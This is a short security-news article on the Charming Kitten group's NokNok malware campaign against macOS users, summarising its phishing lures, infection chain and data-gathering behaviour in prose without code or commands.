HQ/EMEAFind out how we can help your business
Charming Kitten has introduced the new NokNok malware in the wild, primarily targeting macOS systems. Based on reports, the campaign started last May and utilised an alternative method of infection compared to other instances.
The group has transitioned from macro-based attack methods that use Word documents to utilising LNK files to run their payloads. Moreover, the hackers use the guise of US nuclear experts and approach their targets with thought-provoking propositions to bait them into reviewing drafts concerns about foreign policy.
The Charming Kitten group sent a different link to infect macOS users with the NokNok malware.
The Charming Kitten group’s attack strategy against Windows users is to gain trust by sending a malicious link with a Google Script macro. However, if their target is a macOS user, they send a different connection to deploy the NokNok malware.
Researchers noted that the attackers use the link that could redirect victims to the library-store[.]camdvr[.]org, which hosts a ZIP file disguised as a RUSI VPN application.
Next, the threat actors will trigger a curl command after executing the Apple script file found within the archive. This process will fetch the NokNok payload and establish a backdoor into the victim’s macOS.
The NokNok malware then uses a set of four bash script modules to acquire various objectives after generating a unique system identifier. The confirmed goals include establishing persistence, establishing communication with the command-and-control server, and starting the exfiltration of information to the attacker-controlled server.
In addition, the malware gathers system information, such as the running processes, installed apps, and operating system versions, as part of its malicious operations. Furthermore, NokNok adopts various encryption tactics and encodes the data in base64 format before exfiltrating the harvested information to ensure its confidentiality.
The Charming Kitten group has continued to evolve its infection methods to hinder detection efforts and execute cyberespionage operations against its targets. This campaign shows the adaptability of the attackers since they have developed an ability to target macOS systems.
Lastly, the emergence of NokNok highlights the constant upgrade of sophisticated malware against multiple Operating Systems.
